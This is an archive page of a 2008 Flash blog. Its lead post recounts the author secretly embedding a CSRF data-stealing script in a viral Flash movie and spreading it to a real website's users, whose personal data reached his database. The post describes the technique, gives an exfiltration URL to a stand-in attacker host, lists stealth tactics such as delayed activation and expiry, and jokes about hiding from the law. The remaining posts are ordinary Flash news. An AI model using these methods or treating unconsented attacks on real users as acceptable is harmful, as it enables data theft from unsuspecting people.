Archive for the ‘Flash General’ Category

« Older Entries
Newer Entries »

Encapsulating CSRF attacks inside massively distributed Flash movies – Real world example

Sunday, September 14th, 2008

Update: Added a sterilized demo and the source code.

CSRF (Cross Site Request Forgery) is considered one of the most widely spread exploits in websites today. I’ve written before about how a legitimate Flash file (swf) can be extremely viral. Few days ago I did a real attack, exploiting a CSRF flaw and elaborated it using the nature of Flash virality. The result shocked me.

I have a confession, I sometime look at the source of websites I browse, generally just to see how they did this and that. I also sometimes encounter security flaws in the script I examine, these flaws range from the very dangerous to the not so important, and my reactions range from informing the owners to just ignore it. I had the honor to find a very lame CSRF flaw in a big website which I’m familiar with it’s owners and some of its users. It was a great opportunity to do a real world test on this exploit. In the exploit I found, the attacker can obtain a lot of personal information from the user. A famous CSRF of similar nature has happened to gmail. Bear in mind that this kind of test is illegal and you should always be sure you won’t get in trouble, or just hide very well ;)

I took the same old viral movie of the pug cleaning the screen (screenclean.swf) and manipulated it (added some simple script) in a way that will attempt to attack any user that’ll view it, if the attack is successful and the user data is stolen it’ll be posted to my database (I’ll review the technical details at a latter point). I’ve then, uploaded the file to a server and sent the link to a few users that I know that uses that website, making it look like a naive chain letter.

pug_csrf

Then, I’ve waited for the stolen data to appear in my  database. It was exiting when the first hacked users started to emerge, and with every few refreshes there was a new one. It got a little scary when I saw users that I haven’t directly sent them the email. It was a proof of the virality of the attack.

csrf_db_table_01t

I was shocked when I saw that some of the users were added to my database being attacked from other servers then mine. This has proved the main point of the test, that attacks inside Flash (swf) files aren’t only viral but also get distributed. I wanted to show that this can happen pointing the screenclean.swf which can be found on ~600 different locations. I’ve never imagined that’ll it’ll happen so fast with my test, and on such an old movie.

After a few hours I’ve pulled the plug on this test and changed the swf file to the harmless original. But it was already too late the swf file got re-distributed (copied to other servers). Since I didn’t set the attack to expire and hasn’t obfuscate the code inside it, It was still attacking users, and worse, someone can look inside the swf and manipulate the attack to his needs. I had no control over that anymore, so we needed to fix this CSRF flaw ASAP.

Using Flash as a vessel to distribute CSRF attacks has some distinct benefits for the attacker:

- Beside the virality nature of these kind of Flash videos and games, swf files gets redistributed (hosted from other servers). This kind of attack will work no matter which server the file is served from, directly or embedded inside an html page.

- Script is hidden inside the Flash (swf), won’t be seen even with “View Generated Source”. Can be obfuscated inside the swf as well. Unless you’re watching the traffic you’ll see nothing suspicious.

- Multiple attacks in one swf. If it’s a game played for an hour, there is plenty of time to try many different attacks. The swf can download new kinds of attacks and/or instructions, when these are available, from the attacker server.

- Attack can be manipulated according to the date and time. For ex, let the swf distribute for a few days before starting to attack, set the attack to expire to make it more stealthy.

- Use shared object (Flash cookie) to maintain the user hacked status, more consistent then a cookie.

- Stealing large amount of data is easier as the data can be taken back to the swf and cross-domain Post can be used instead of Get.

Technical info

First of all, what enable this attack is the flaws and features inside every browser and the Flash Player, as I describe here.

Most CSRF attacks manipulate the user data on his behalf, as described here. The flaw I’ve found is returning live Javascript object with lots of personal data, similar to what happened to gmail. It was done this way, I guess, for ease of development, every page that is authenticated can load the url http://victim.com/personal.php?random and get the user’s data ready for any javascript code on the page, for ex, personalData.email.

The way that browsers are built, when the user is authenticated on one domain with a session or a cookie, every page that’ll load a url from this domain inside a script tag will use the authentication, even if the main page is on different domain. A script tag is one of these rare elements that are exempt from the browsers cross-domain-policy and can be loaded for use on different domains.

When the Flash movie (swf) is viewed inside a browser, the swf is “injecting” a javascript code to the page. This javascript is manipulating the page’s DOM and dynamically creating a script tag, this script is loading the vulnerable url as it source. Most of CSRF attacks will be done at this point, but, since our url is returning data, we need to wait for it and then steal it. We use an interval to check when the data is ready on the page, parse it as a string only with the important data then save it to our server database using the dynamically c
reated script with a get parameter http://attacker.com/stolenData.php?data=sensetive_data. We could have considered putting the data back into the swf and then post it to our server, Flash can do a cross-domain post as opposed to Javascript, might be more efficient when dealing with a large amount of data.

If the attack is successful we save it as a cookie, so we won’t attack the same user more then once. Again, we might consider using a Flash shared object which have more consistency.

Fixing the flaw in the website was just a matter of changing the returned data to a raw JSON instead of a live Javacript object. Fixing all CSRF flaws in a website generally is slightly more cumbersome, but not that much.

Added a sterilized demo and the source code.

Summery

Generally users feel comfortable following links, thinking it’s safe since they’re not installing anything, all the more so when it comes to links for flash and images.

This kind of attack is easy to reproduce, an attacker can simply go to youtube, download the FLV of the coolest short video and repeat the process, or worse, put it inside of an addictive game.

There is a tendency to accuse the platforms for being insecure. I agree that the browsers and the Flash Player will have to disallow scripting between them by default when loading a swf file directly, IE already tries to do it but fails miserably. That won’t solve any scenario though, since the harmful swf can be naively embedded inside an html page with scripting set to be allowed.

It’s always up to the developer to develop secure websites and applications without any CSRF or other type of flaws. No matter how strict is the platform (in this case the browsers and the Flash player), a “good” developer will be able to break the toughest security model in a second by writing vulnerable script.

It up to the developer to be a Safeloper and to produce secure applications ;)

The users should be able to feel safe following a link they get in an email message, it’s part of the nature of the Internet, following links that is.

I also did a similar attack using a JPG but that’s a different story.

Posted in Actionscript, Flash General, Flash Security, Google Chrome, Javascript, Safeloper, Security | 8 Comments »

Police brutality against Flash

Monday, September 8th, 2008

Update: You need to check the website to see what I’m talking about

The police (not the band) in general is a problematic institute. Giving average (and below) humans an excessive power and it’s likely that this power will get badly abused. I’ve always considered the Israeli police as somewhat average (average is relatively very good for a police).

Until I saw their pathetic attempt to create what they call the “Virtual Police Station“, created with the worst standards of the 90′s, this is clearly is a bad abuse of the Flash technology.

One should ask himself, until when will I stand aside and let these kind of things happen, when will I stand up and protest?!

Fat cop, thin cop (It stretches)

fat_cop_thin_cop 

 

The police is not secure?!

police_security

 

Although the result is very bad, I must consider there’s might, only might be some users with a very low tech knowledge that might find this version of the website easier to understand. And for that doubt alone, and because I don’t want to be hunted by the police and spend the rest of my life behind bars. I’ll congrat them for the attempt to create something different ;)

Posted in Flash General, Security | No Comments »

Reliving your childhood through every browser

Tuesday, August 19th, 2008

This is what fMAME is all about, it’s a MAME (Arcade Games Emulator) written in Flash that is running in every browser with no installation. I get enthusiastic remarks like “Wow I used to play this on the arcade” from most of the people I’ve sent the link to. For now, there’s no sound and only a handful of games are supported, but, it’ll surly improve in the future.

Of course I could have sent them the info of how to download and run the desktop MAME emulator and how to find roms for it. It’ll give them the same experience of traveling back in time. But, how many will bother to do that? Yes it’s simple but the common users want it to be very simple. They don’t want to be bothered with downloads and installation they want to follow a link and start the experience.

The second thing I hear from the people I’ve sent this link to, is, “how did they do that?!” then I need to explain that Flash isn’t just for Ajax like website it’s a complete platform that is only (mainly) stoppable by the creators imagination.

Did I mention it runs in every browser?! ;)

Play fMAME

Donkey_Kong

Ghostsn_Goblins

Bubble_Bobble

Posted in Flash Games, Flash General, Games | No Comments »

Mysteries Flash exploit is hijacking the clipboard?

Sunday, August 17th, 2008

Update: Adobe Product Security Incident Response Team (PSIRT) has referred to this “Clipboard attack”

Update 2: Aviv Raff has updated me about the fact that it won’t be that easy to replicate this attack using Javascript on the latest browsers and with the default security settings. Thanx.

Lately there were some rumors about a mysteries Flash exploit that is hijacking the users clipboard and will always fill it with a URL to some malicious website, no matter what you’ll copy to the clipboard it’ll will always paste the same URL. This malicious website will ask you to download a fake anti-virus. It’s also been mentioned in some places that in order to clear this behavior you’ll have to restart your machine.

But is it really an exploit, a bug in the Flash player that let the attacker demolish the users clipboard until restart?! From what I’ve seen so far it’s not an exploit and no restart is needed, it’s just a bad use of a Flash and JavaScript feature. Both of these allow a valid script to write text to the user’s clipboard. I’m surprised that only now this questionable feature is starting to get abused. The abusing code is probably residing in some Flash AD, in one of the user tabs and consistently rewriting the clipboard.

Although this attack can be done using simple JavaScript, Flash it the right vessel for this kind of attacks. I think that, encapsulating attacks inside RIA code, mainly Flash and SilverLight, is just starting to gain attention and will become a major security issue. I have some other examples which I attend to write about soon.

Posted in Flash General, Flash Security, Javascript, RIA, Security, Silverlight | 1 Comment »

Adobe to incorporate Voice-to-Text capabilities into Flash Video. SEO Video?

Thursday, July 24th, 2008

Update: via The Universal Desktop, it’s getting closer.

Before you’ll get too enthusiastic, it’s not like the next Flash Player will get a real-time Voice-to-Text engine. Instead, Adobe is working on tools to automatically transcribe the speech from a video and embed it into that video metadata when it’s published as FLV (Flash Video). Probably not something that you can’t already, painfully, do manually with the current FLV and it’s metadata. The key point here is simplicity.

This can be used, for example, to easily create subtitles for our videos. But, the main goal of this technology is to let search engines index video content and even deep link into a video relevant time.

Personally I’d prefer a native real-time engine inside the player that weights only 50kb, but, this is also nice :)

http://www.beet.tv/2008/07/huge-adobe-read.html

Posted in Flash General, RIA, SEO, Web 2.0 | 2 Comments »

Adobe fight fire with fire

Tuesday, July 1st, 2008

Recently Adobe has been needing to deal with a massive force attacking its main domain of dominance, we can call this domain – the highly interactive web or RIA. I don’t refer to Microsoft SilverLight which is supposed to compete with Adobe Flash on the same ground, but to the brutal MS marketing machine. This machine can make every boy and girl blindly recite fallacious facts and numbly say things like “Yeah, but, SilverLight is search engine optimized”.

It took Adobe some time to understand what it is dealing with, and I think I’ve noticed a change in their PR brutality lately, generating big PR out of small things.

This last SEO announcement from Adobe, which claim that Flash will be more searchable by search engines, might have some substance in it, as opposed to the similar one from Microsoft, but, it’s still mainly a marketing battle. I just hope it doesn’t take too many resources out of the real development of the products.

Google were probably working on their own humanoid crawler that has a broader vision then just the Flash Player and can work with any RIA applications even if its written in AJAX or SilverLight. Apparently searching and indexing RIA is not an easy thing to achieve, and it doesn’t seem that even google has managed to do it yet.

The main problem of indexing Flash websites or any other RIA website, is to understand the context of the data and then link to it directly, aka deep linking. The fact that google can now read the text from within Flash even better then it did before, don’t yet solve that problem.

Even so, it doesn’t mean that we shouldn’t be optimistic, and there is a possibility that this will improved the indexing of Flash content. We’ll have to wait and see.

Posted in AJAX, Flash General, Google, RIA, SEO, Silverlight, Web 2.0 | No Comments »

XP SP3 downgrade the Flash Player

Tuesday, June 3rd, 2008

Update: Apparently SP3 doesn’t downgrade the player. It’ll only install an older version 9.0.115 if you don’t have the latest 9.0.124 already installed, according to this blog post from Ryan Stewart. More info here.

The latest Windows XP service pack 3 comes bundled with the old 8.0.24.0 version of the Flash player. This version, beside not being able to play back some of the latest web content, has some major security flaw, along with a weaker security model and some other bugs.

If you apply this update to your windows system, make sure you install the latest Flash player from here.

Posted in Flash General, Flash Security, Security | 5 Comments »

RIA on the mobile phones and small devices

Monday, March 31st, 2008

Flash, SilverLight, Android, JavaFX, QT and the iPhone. Seems that everyone wants to redefine our mobile phone, the ultimate device/gadget of all time. I’ve written a summary of the latest advancement in the area of rich mobile applications.

Read it here.

Posted in Flash General, Flash Lite, Games, Google, Human VOIP, Mobile, RIA, Silverlight, iPhone | No Comments »

My new blog – Human VOIP

Monday, March 24th, 2008

Writing a blog is not a simple task, writing a good blog is very difficult. I’m not sure I’m the kind of person who can handle more then one blog, I’m not Lee Brimelow :) , but, I’ll give it a try anyway.

My new blog name is, Human VOIP, it’s supposed to be mainly about telephony related stuff, but, somehow Flash seem to sneak in ;)

Posted in Flash General, Human VOIP, JAJAH, VOIP 2.0, Wordpress | 4 Comments »

Security flaws in FLA files

Thursday, March 20th, 2008

FLA is one of these file format that we’re used to freely open without any fear. Our complete confidence is going to change since a new exploit has been found. This exploit enable an attacker to manipulate an FLA file in a way that, when loaded into the Flash CS3 or 8 IDE, it will execute arbitrary code on our machine.

No need to panic, it’s unlikely that too many of the malicious FLA files are floating around. Just don’t run any untrusted FLA files until Adobe will issue the fix.

More info

Technical info

Posted in Flash CS3, Flash General, Flash Security, Security | No Comments »

« Older Entries
Newer Entries »